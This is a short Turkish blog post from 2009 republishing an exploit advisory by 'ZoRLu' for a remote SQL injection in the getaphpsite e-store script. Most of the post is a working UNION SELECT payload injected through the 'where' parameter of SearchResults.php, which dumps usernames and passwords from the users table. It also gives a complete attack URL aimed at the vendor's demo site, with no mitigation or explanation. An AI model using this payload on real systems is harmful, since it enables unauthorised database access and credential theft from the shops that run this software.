getaphpsite e-store (where) Remote Sql inj

1 Ocak 2009 Perşembe

getaphpsite e-store (where) Remote Sql inj


getaphpsite e-store (where) Remote Sql inj

link: http://packetstormsecurity.org/0812-exploits/estore-sql.txt

link: http://www.exploiter5.com/all.php?id=61

Discovered By: ZoRLu

Exploit:

http://z0rlu.blogspot.com/script/SearchResults.php?SearchTerm=ZoRLu&where=[SQL]

[SQL]=

ItemName+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users--&ord1=ItemName&ord2=asc

for demo:

http://www.getaphpsite.com/demos/estore/SearchResults.php?SearchTerm=ZoRLu&where=ItemName+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users--&ord1=ItemName&ord2=asc

ZoRLu | ZRL | Buffer Overflow

1 Ocak 2009 Perşembe

getaphpsite e-store (where) Remote Sql inj

0 yorum:

About Me

Blog Archive

İzleyiciler

Bağlantılarım

Inj3ct0r.com